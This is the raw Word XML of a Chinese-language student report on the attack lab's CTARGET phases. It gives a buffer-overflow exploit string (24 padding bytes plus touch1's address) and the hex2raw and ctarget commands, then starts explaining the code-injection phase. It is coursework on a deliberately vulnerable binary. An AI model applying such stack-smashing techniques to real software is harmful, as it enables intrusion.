        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>5 validate(1);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>6 exit(0);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>7 }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Your task is to get CTARGET to execute the code for touch1 when getbuf executes its return statement, rather than returning to test. Note that your exploit string may also corrupt parts of the stack not directly related to this stage, but this will not cause a problem, since touch1 causes the program to exit directly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>任务的目的是在getbuf输入完成后跳转到touch1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>查看getbuf和touch1的汇编代码：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3889375" cy="1991995"/>
            <wp:effectExtent l="0" t="0" r="6350" b="8255"/>
            <wp:docPr id="4" name="图片 4" descr="Y]]D%%4JMIX6R_5(6KYC0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Y]]D%%4JMIX6R_5(6KYC0KH"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3889375" cy="199199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可知getbuf中栈的容量是0x18，即24个字节，若输入超过24个字节，则多出来的字节将作为地址返回。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>所以拿任意24个字节填充 后面加上touch1的地址40192b</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>所以填充的文件内容是</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2b 19 40</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="420" w:leftChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>使用vi编辑器创建文件“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>event</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1.txt”，将该段字符串保存后，使用“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>./hex2raw &lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>event</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">.txt&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”命令将该字节文本文件转为字符文本文件“1.txt”保存。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">接下来使用命令“./ctarget </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">–i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1.txt”将准备好的字符串读入程序中，运行结果如下图所示：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3860165" cy="838200"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="5" name="图片 5" descr="@}~U_MO4DV@IDKMB~O~I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_MO4DV@IDKMB~O~IT01"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3860165" cy="838200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="20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任务2：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Phase 2 involves </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>injecting a small amount of code</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as part of your exploit string.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Within the file ctarget there is code for a function touch2 having the following C representation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1 void touch2(unsigned val)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2 {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3 vlevel = 2; /* Part of validation protocol */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>4 if (val == cookie) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>5 printf("Touch2!: You called touch2(0x%.8x)\n", val);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>6 validate(2);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>7 } else {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>8 printf("Misfire: You called touch2(0x%.8x)\n", val);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>9 fail(2);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>10 }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>11 exit(0);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>12 }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Your task is to get CTARGET to execute the code for touch2 rather than returning to test. In this case, however, you must make it appear to touch2 as if you have passed your cookie as its argument.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="630" w:firstLineChars="300"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>任务的目的是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>将cookie值拷贝至寄存器 %rdi 中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>将函数touch2的地址压入栈中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>使得程序顺利进入函数touch2中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,同时touch的参数为cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3555365" cy="2845435"/>
            <wp:effectExtent l="0" t="0" r="6985" b="2540"/>
            <wp:docPr id="6" name="图片 6" descr="R7JZNKGLUM`NE){D_(4X1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7JZNKGLUM`NE){D_(4X1ZO"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3555365" cy="2845435"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="315" w:firstLineChars="150"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>由touch2的汇编代码可以知道，只有touch2的参数为cookie时，才算正确攻击。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">   为了让程序执行输入的指令代码，要将getbuf的返回地址改写为栈顶rsp的地址。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>在getbuf的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>+12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>行gets后处设置断点，查看%rsp的值：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3141980" cy="312420"/>
